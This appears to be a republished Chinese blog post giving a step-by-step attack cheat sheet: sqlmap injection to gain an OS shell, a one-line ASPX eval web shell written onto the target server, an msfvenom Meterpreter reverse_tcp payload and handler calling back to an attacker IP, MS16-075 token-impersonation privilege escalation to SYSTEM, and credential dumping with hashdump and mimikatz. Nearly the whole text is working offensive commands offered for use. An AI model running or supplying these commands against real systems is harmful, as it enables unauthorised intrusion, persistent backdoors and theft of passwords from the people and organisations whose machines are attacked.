sqlmap注入及ms16-075提权总结
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap注入及ms16-075提权总结相关的知识,希望对你有一定的参考价值。
sqlmap注入及ms16-075提权总结
(1)sqlmap执行命令
sqlmap.py -r 1**.***.***.***.txt
sqlmap.py -r 1**.***.***.***.txt --is-db
sqlmap.py -r 1**.***.***.***.txt --password --batch
sqlmap.py -r 1**.***.***.***.txt --os-shell
(2)os-shell下执行命令
ipconfig
dir c:/
echo "thisis test">e:\software\AMS_NoFlow\t.txt
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx
(3)msf下执行命令
生成反弹×××:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe
(4)msf启动及监听
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33(实际为外网IP地址)
set LPORT 4433
exploit
(5)ms16-075提权命令
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
(6)获取密码
run hashdump
(7)mimikatz进行密码获取
load mimikatz
kerberos、livessp、msv、ssp、tspkg、wdigest(逐个命令测试,有的会显示明文密码)
mimikatz_command:mimikatz命令提示窗口
(8)mimikatz命令行下获取密码(未做测试)
privilege::debug
sekurlsa::logonpasswords
以上是关于sqlmap注入及ms16-075提权总结的主要内容,如果未能解决你的问题,请参考以下文章